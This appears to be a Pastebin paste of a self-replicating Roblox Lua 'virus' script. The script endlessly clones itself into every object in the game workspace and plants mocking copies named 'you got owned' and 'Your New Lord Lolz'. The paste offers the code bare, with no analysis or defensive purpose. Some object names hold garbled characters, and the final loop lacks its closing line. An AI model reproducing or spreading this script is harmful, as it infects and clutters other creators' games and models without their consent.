Advertisement
Guest User

Mettemaarit2

a guest
Feb 21st, 2019
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.73 KB | None | 0 0
  1. if script.Parent.className ~= "RotateP" then
  2. local p = Instance.new("RotateP")
  3. p.Parent = workspace
  4. p.Name = "d��������������ng.........you got owned..."
  5. script.Parent = p
  6. end
  7.  
  8. function check()
  9. local list = workspace:GetChildren()
  10. for i = 1, #list do
  11. if list[i]:findFirstChild("d��������������ng.........you got owned...") == nil and list[i].className ~= "RotateP" then
  12. script.Parent:Clone().Parent = list[i]
  13. end
  14. wait()
  15. end
  16. end
  17.  
  18. while true do
  19. check()
  20. if workspace:findFirstChild("Hello...I �m Your New Lord Lolz") == nil then
  21. local main = script.Parent:Clone()
  22. main.Name = "Hello...I �m Your New Lord Lolz"
  23. main.Parent = workspace
  24. end
  25. wait(3)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement